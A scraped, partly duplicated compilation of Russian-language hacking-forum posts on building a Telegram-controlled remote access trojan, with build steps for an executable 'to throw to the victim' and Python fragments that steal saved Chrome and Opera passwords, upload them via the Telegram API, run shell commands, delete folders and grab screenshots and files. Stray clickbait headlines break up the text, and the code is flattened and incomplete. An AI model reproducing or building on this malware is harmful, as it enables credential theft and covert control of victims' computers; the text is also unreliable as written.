Telegram RAT с открытым исходным кодом
В большинстве случаев, чтобы управлять удаленно ПК нужно пробрасывать порты, устанавливать дополнительный софт, криптовать билд и т.д. Теперь можно обойтись без этого благодаря API Telegram, с помощью него можно легко создавать полноценные инструменты удаленного контроля. Вместо стандартного билда — бот написанный на Python, вместо консоли — чат.
Плюсов у данного способа много: простая настройка, не нужно пробрасывать порты, не детектится антивирусом. А минус основывается на использовании одного чат-бота под один зараженный ПК, что не очень удобно.
Установку компонентов и сборку билда можно делать на Windows.
2. Переходим в директорию
«Путь к папке с репозиторием»
3. Устанавливаем зависимости.
pip install –r requirements.txt
1. Создаем бота в Telegram с помощью BotFather.
2. Открываем файл RATAttack.py через редактор и вставляем токен созданного бота в переменную token.
КАК Я СОЗДАЛ ОПАСНЕЙШИЙ ВИРУС И ЗАРАБОТАЛ НА ЭТОМ!
3. Запускаем setup_rat.py через командную строку, он автоматически соберет .exe файл, который можно кидать жертве.
P.S Обязательно напомню, что использоваться вирус против других незаконно и не рекомендуется!
Источник: gebutcher.blogspot.com
Создание RAT в Telegram
В большинстве случаев, чтобы управлять удаленно ПК нужно пробрасывать порты, устанавливать дополнительный софт, криптовать билд и т.д. Теперь можно обойтись без этого благодаря API Telegram, с помощью него можно легко создавать полноценные инструменты удаленного контроля. Вместо стандартного билда — бот написанный на Python, вместо консоли — чат.
Плюсов у данного способа много: простая настройка, не нужно пробрасывать порты, не детектится антивирусом. А минус основывается на использовании одного чат-бота под один зараженный ПК, что не очень удобно.
Установку компонентов и сборку билда нужно делать на Windows.
2. Переходим в директорию
cd «Путь к папке с репозиторием»
3. Устанавливаем зависимости.
pip install –r requirements.txt
1. Создаем бота в Telegram с помощью BotFather.
2. Открываем файл RATAttack.py через редактор и вставляем токен созданного бота в переменную token.
3. Запускаем setup_rat.py через командную строку, он автоматически соберет .exe файл, который можно кидать жертве.
P.S Обязательно напомню, что использовать вирус против других незаконно и не рекомендуется!
Источник: cvvboard.cc
Свой RAT на python.
Привет, хацкер, задумывался когда нибудь как создать свой РАТник? Если да, то эта статья для тебя.
Перед тем, как мы начнём писать РАТник, расскажу о его функционале:
- Управление через телеграм бота.
- Получение паролей с браузеров: Chrome, Opera.
- Информация о ПК.
- Завершение процесса по имени.
- Выполнить комадну в CMD.
- Открыть URL в браузере.
- Загрузка файла с ПК жертвы.
- Получение текущей директории.
- Удаление папок на ПК.
- Получение скриншота экрана жертвы.
Этап I. Настройка бота.
Для начала мы должны создать нашего бота, в этом нам поможет
Как пользоваться NjRAT? Приколы вируса удаленного доступа
должны придумать имя с окончанием «_bot». После BotFather выдаст нам token для управления нашим ботом.
Замазал токен и ссылку на бота.
Id — Chat ID
Этап II. Установка библиотек.
Из стороних библиотек python’a нам потребуется: telebot (для работы с ботом, обработки команд) и sqlite3 (для получения паролей)
Устанавливаем, введя команду в консоли:
pip install pyTelegramBotAPI
pip install pywin32 или pip install win32crypt
pip install telebot
Этап III. Функционал бота. Код.
Для начала импоритруем все нужные библиотеки. Комментарии к коду отмечены так: # Я комментарий
import telebot # Для работы с ботом import os # Для работы с директориями / файлами import requests # Для отправки документов / скринов from PIL import ImageGrab # Для получения скриншота import shutil # Для копирования файлов Login Data import sqlite3 # Для работы с БД, где хранятся пароли import win32crypt # Для расшифровки паролей import subprocess # Для завершения процесса import platform # Для получения информации о ПК import webbrowser # Для открытия ссылки в браузере
Теперь создаём переменные для бота:
bot_token = «XXXXX:XXXXXXXXXX» # Токен от бота chat_id = «XXXXXXXXX» # ID чата
bot = telebot.TeleBot(bot_token) # Дополнительная переменная для обработки команд
Перейдём к обработке первой команды — /start:
Ну и сразу добавим обработку команды /commands:
Сделаем обработку команды /Screen для получения скриншота экрана:
Теперь будем получать пароли, для этого создадим две отдельные функции, которые после команды вызовем и отправим файл с паролями.
P.S Функцию стиллинга взял со статьи по кодингу стиллера на python’e , глянь.
Функции стиллинга готовы, теперь обработаем коммаду /passwords:
if («».format(message.text) == «/passwords chrome») : # Если сообщение /passwords chrome try: # Пробуем Chrome() # Вызываем функцию bot.send_message(chat_id, «Wait. «) files = requests.post(«https://api.telegram.org/bot» + bot_token + «/sendDocument?chat_id=» + chat_id , files=files) except: # Если есть ошибки bot.send_message(chat_id, «Ошибка! Браузер запущен!»)
elif («».format(message.text) == «/passwords opera») : # ИначеЕсли текст /passwords opera Opera() bot.send_message(chat_id, «Wait. «) files = requests.post(«https://api.telegram.org/bot» + bot_token + «/sendDocument?chat_id=» + chat_id , files=files)
else : # Иначе bot.send_message(chat_id, «Ошибка! Команда введена неправильно!»)
Теперь сделаем обработку команды /Info для получения информации:
bot.send_message(chat_id, «PC: » + username + «nIP: » + IP + «nOS: » + windows + «nProcessor: » + processor) # Отправляем сообщение с данными
Обработка команды /pwd :
Обработка команды /kill_process
user_msg = «».format(message.text) # Переменная в которой содержится сообщение subprocess.call(«taskkill /IM » + user_msg.split(» «)[1]) # Убиваем процесс по имени bot.send_message(chat_id, «Готово!»)
Обработка команды /cmd
user_msg = «».format(message.text) subprocess.Popen([r’C:\Windows\system32\cmd.exe’, user_msg.split(» «)[1]]) # Запускаем cmd bot.send_message(chat_id, «Готово!»)
Обработка команды /open_url
user_msg = «».format(message.text) url = user_msg.split(» «)[1] # Объявляем переменную, в которой содержится url webbrowser.open_new_tab(url) # Открываем ссылку bot.send_message(chat_id, «Готово!»)
Обработка команды /ls
Обработка команды /cd
user_msg = «».format(message.text) path2 = user_msg.split(» «)[1] # Переменная — папка os.chdir(path2) # Меняем директорию bot.send_message(chat_id, «Директория изменена на » + path2)
Обработка команды /download
Обработка команды /rm_dir
user_msg = «».format(message.text) path2del = user_msg.split(» «)[1] # Переменная — имя папка os.removedirs(path2del) # Удаляем папку bot.send_message(chat_id, «Директория » + path2del + » удалена»)
Ну и последняя обработка /About
Последние, что мы добавим — запуск бота:
bot.polling()
На этом всё, если ты понял, как работает этот РАТ, то доработать его не составит труда. И помни: Dark $ide — место для одарённых. Удачи тебе, хацкер.
Источник: teletype.in